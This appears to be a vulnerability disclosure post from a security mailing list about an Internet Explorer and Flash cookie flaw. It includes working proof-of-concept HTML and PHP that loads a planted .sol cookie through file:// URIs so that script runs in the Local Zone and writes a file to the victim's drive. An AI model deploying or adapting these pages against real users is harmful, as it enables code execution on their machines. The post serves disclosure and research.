Internet Explorer Vulnerability: Content-Location works with both triple and double slash
After I reported the Content-Location Vulnerability
(http://www.securityfocus.com/archive/1/342317),
Thor Larholm explained that the html execution was not caused by the
Content-Location header, but instead
by the triple slash (file:///).
I have tested it with double slash and I even tested the triple slash without
the Content-Location header,
but neither worked.
The difference between triple slash and double slash is that in triple htm.html
loads the cookie in the iframe,
and with double slash it causes the whole page to try and load the cookie which
would then require the user
to press Back and then refresh the page.
I have created 2 proof-of-concepts which show how both vulnerabilities can not
be exploited separately.
1. http://mlsecurity.com/ie/wee.php
This page will create a flash cookie and when you press continue it will load
htm.html which contains an iframe.
This iframe will load red.php which contains the Content-Location header
pointing at the flash cookie.
The flash cookie location will only have a double slash (file://).
wee.php - Loads a flash movie which creates a cookie in
C:/Documents and Settings/administrator/Application Data/Macromedia/Flash
Player/mlsecurity.com/mlsecurity.sol
htm.html
******************************
<html>
<script type="text/javascript" src="querystring.js"></script>
<script>
document.write(unescape("%3Ciframe%20name%3D%22wee2%22%20src%3D%22red.php%3Fa%3D"
+ QueryString['a'] + "%26drive%3D" + QueryString['drive'] +
"%22%3E%3C/iframe%3E"));
</script>
<br><p>
Sometimes the iframe doesn't load properly. If the iframe shows a white blank
page then press refresh.
<p>
You will know when the exploit worked when the iframe shows weird stuff like
my_Array0Sven1kelor2.
<p>
The script assumes you are under windows 2000/XP logged on as administrator.<br>
If you are not logged on as administrator type the username you're logged in
under in the box below and press Go Go Go.<p>
<form method="GET">
Logged on to windows as user: <input type=text name="a"
value="administrator"><br>
Windows is installed on drive: <input type=text name="drive" value="C"><br>
<input type=submit value="Go Go Go">
</form>
<p>
This should create a file called mlsecurity.txt in your c:\ drive.
<p>
<a href="exp.php">How it works?</a>
</html>
******************************
red.php
******************************
$a = $_GET["a"];
if(!$a || $a=="undefined")
{
$a="administrator";
}
if($_GET["drive"] && !strstr($_GET["drive"],"unde"))
{
$d=$_GET["drive"];
}else
{
$d="C";
}
header("Location: file://".$d.":/Documents and Settings/".$a."/Application
Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol");
******************************
2. http://mlsecurity.com/ie/ie.php
This proof-of-concept only uses the triple slash method to open the cookie in
an iframe.
ie.php - Loads a flash movie which creates a cookie in C:/Documents and
Settings/administrator/Application Data/Macromedia/Flash
Player/mlsecurity.com/mlsecurity.sol
htm2.html
******************************
<html>
<iframe src="file:///C:/Documents and
Settings/administrator/Application Data/Macromedia/Flash
Player/mlsecurity.com/mlsecurity.sol"></iframe>
<p>
Note: you might need to edit the html to fit your system.
<p>
Macromedia Flash Player is reported to store Flash cookies (.sol files) in a
predictable location on client systems.
Other attacks are possible given the ability to store content on a system in a
predictable location, such as
referencing the content via a file:// URI. This is compounded by the fact that
an attacker could include HTML
and script code in the cookie, which may be interpreted by Internet Explorer or
possibly other browsers.
In the example of Internet Explorer, such content would be interpreted in the
context of the Local Zone.
Successful exploitation would still require the attacker to guess the local
username of the victim.
<br>
<br>This issue is reported to affect versions of the player for Microsoft
Windows operating systems.
Other versions may also be affected. Macromedia Director MX is similarly
affected.
<br>
<br>This issue was originally covered by Securityfocus.com BID 8886 but has
been determined to be a distinct
issue in Macromedia Flash. Securityfocus.com BID 8886 was also updated with
additional technical details
describing a new issue in Internet Explorer. The original report for these
issues was a proof-of-concept
provided by Mindwarper which exploited both of the issues simultaneously.
<p>
- Discovered by Mindwarper<br>
</html>
******************************
I have tested these pages on both win2k sp4 ie6 fully patched and on winXP.
I even tried using a few IE hacks and it still worked.
-----------------------------|
- Mindwarper |
- mindwarper@xxxxxxxxxxxxx |
- http://mlsecurity.com |
-----------------------------|
--
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.
Powered by Outblaze